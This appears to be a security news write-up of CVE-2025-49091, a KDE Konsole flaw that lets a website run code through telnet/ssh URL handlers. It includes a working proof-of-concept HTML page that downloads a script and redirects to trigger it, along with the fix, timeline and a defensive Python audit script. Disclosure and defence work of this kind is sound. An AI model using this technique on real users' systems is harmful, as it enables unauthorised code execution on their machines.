Sunday, January 18, 2026

KDE Konsole Terminal Emulator Flaw Allows Remote Code Execution Through Malicious Website URLs

A recently disclosed vulnerability (CVE-2025-49091) in Konsole, KDE’s flagship terminal emulator, enables remote code execution (RCE) via specially crafted URL schemes when combined with KTelnetService and missing standard network utilities.

The issue, fixed in Konsole 25.04.2, highlights the importance of robust scheme handler validation and the risks of automatic command fallbacks.

Technical Background and Exploitation Vector

The vulnerability leverages KDE Konsole’s handling of command-line arguments when a network utility is missing—specifically telnet, rlogin, or ssh. Under default conditions in certain KDE desktop environments (notably Fedora KDE Plasma Desktop 42), these utilities are not installed. If a user allows their web browser to open a telnet://, rlogin://, or ssh:// URL, KTelnetService invokes Konsole to handle the request.

Default KTelnetService desktop entry:

```text
[Desktop Entry]
Type=Application
Exec=ktelnetservice6 %u
Icon=utilities-terminal
MimeType=x-scheme-handler/telnet;x-scheme-handler/rlogin;x-scheme-handler/ssh;
NoDisplay=true
Name=KTelnetService
...
```

When a browser encounters a scheme (like telnet://), it queries the system for the handler, typically prompting the user:

“Allow this site to open the telnet link with KTelnetService?”

If accepted, KTelnetService executes a command like:

```bash
/usr/bin/konsole --noclose -e telnet /proc/self/cwd/Downloads/evil
```

The critical flaw arises if telnet is missing. Konsole tries to execute the requested command but instead falls back to /bin/bash, passing the original argument:

```bash
/bin/bash /proc/self/cwd/Downloads/evil
```

This effectively executes any script downloaded to the specified location.

Attack Scenario and Proof of Concept

Step-by-step exploitation:

  1. The user visits a malicious website containing a script that downloads a payload and then redirects to a special URL:

     ```html
     <html>
       <head>
         <script type="text/javascript">
           function downloadAndRedirect() {
             const anchor = document.createElement('a');
             anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg==";
             anchor.download = 'evil';
             document.body.appendChild(anchor);
             anchor.click();
             document.body.removeChild(anchor);
             setTimeout(() => {
               window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
             }, 1000);
           }
         </script>
       </head>
       <body onload="downloadAndRedirect()">
       </body>
     </html>
     ```

  2. The script downloads a file (evil) with the following contents:

     ```bash
     echo "Hello world"
     touch /tmp/foobar
     ```

  3. The browser redirects to:

     ```text
     telnet:///proc/self/cwd/Downloads/evil
     ```

     If the user accepts the prompt, Konsole attempts to execute:

     ```bash
     telnet /proc/self/cwd/Downloads/evil
     ```

     Since telnet is missing, Konsole falls back to:

     ```bash
     /bin/bash /proc/self/cwd/Downloads/evil
     ```

  4. The script executes, printing “Hello world” and creating /tmp/foobar:

     ```text
     Warning: Could not find 'telnet', starting '/bin/bash' instead. Please check your profile settings.
     Hello world
     ```

This demonstrates arbitrary code execution by merely allowing a website to open a nonstandard URL in a vulnerable setup.

The Fix and Responsible Disclosure

The vulnerability was patched in Konsole 25.04.2 by clearing command-line arguments when the requested command (e.g., telnet) is not found.

This ensures that the fallback shell (/bin/bash or another) is launched without arguments, so the attacker-supplied path is never handed to it as a script.

Commit responsible for the fix: 09d20dea

Timeline:

  • 2025-04-16: Issue reported to security@kde.org; acknowledged the same day.
  • 2025-05-12: KDE security team confirmed the exploit and announced fixes in preparation.
  • 2025-06-05: The team notified reporters that the fix was complete and would be publicly disclosed.
  • 2025-06-09: KDE Security Advisory published.
  • 2025-06-10: Public write-up released.

Security Recommendations

To mitigate risks:

  • Update Konsole to version 25.04.2 or newer.
  • Be cautious when prompted by browsers to open external applications via non-standard URLs.
  • Review and restrict scheme handler registrations on critical systems.
  • Educate users about the dangers of allowing websites to open external applications.
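As an added example (not code from KDE or from the advisory), the following Python helps with the "review scheme handler registrations" recommendation: it parses .desktop entries, reports any telnet/rlogin/ssh handler registered on a host where the matching utility is missing (the precondition for CVE-2025-49091), and models the pre-fix and fixed Konsole fallback side by side. The desktop entry is the one quoted above; `shutil.which` is assumed as the default existence check, and `konsole_fallback` is a simplified model of the behaviour described in the write-up, not Konsole's source.

```python
import shutil

# Desktop entry copied from the write-up above (constructed sample input).
SAMPLE_ENTRY = """[Desktop Entry]
Type=Application
Exec=ktelnetservice6 %u
Icon=utilities-terminal
MimeType=x-scheme-handler/telnet;x-scheme-handler/rlogin;x-scheme-handler/ssh;
NoDisplay=true
Name=KTelnetService
"""
RISKY_SCHEMES = ("telnet", "rlogin", "ssh")  # each scheme needs a utility of the same name

def parse_desktop_entry(text):
    """Parse the [Desktop Entry] group of a .desktop file into key/value pairs."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def handled_schemes(entry):
    """URL schemes the entry registers through x-scheme-handler/<scheme> MIME types."""
    mimes = [m for m in entry.get("MimeType", "").split(";") if m]
    return [m.split("/", 1)[1] for m in mimes if m.startswith("x-scheme-handler/")]

def audit_scheme_handlers(entries, command_exists=lambda c: shutil.which(c) is not None):
    """Map each risky scheme whose utility is missing to the handlers registered
    for it: the precondition under which Konsole < 25.04.2 ran /bin/bash instead."""
    findings = {}
    for text in entries:
        entry = parse_desktop_entry(text)
        for scheme in handled_schemes(entry):
            if scheme in RISKY_SCHEMES and not command_exists(scheme):
                findings.setdefault(scheme, []).append(entry.get("Name", "?"))
    return findings

def konsole_fallback(argv, command_exists, fixed=True):
    """Model (assumption, not Konsole's code) of '-e' handling when argv[0] is not
    found: the pre-fix build passed the caller's arguments on to /bin/bash; 25.04.2 clears them."""
    if command_exists(argv[0]):
        return list(argv)
    return ["/bin/bash"] if fixed else ["/bin/bash", *argv[1:]]
```

Running `audit_scheme_handlers([SAMPLE_ENTRY])` on a real host uses `shutil.which`, so an empty result means every registered risky scheme has its utility installed.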

This incident underscores the dangers of automatic command fallback and the importance of secure handling of external protocol requests in desktop environments.
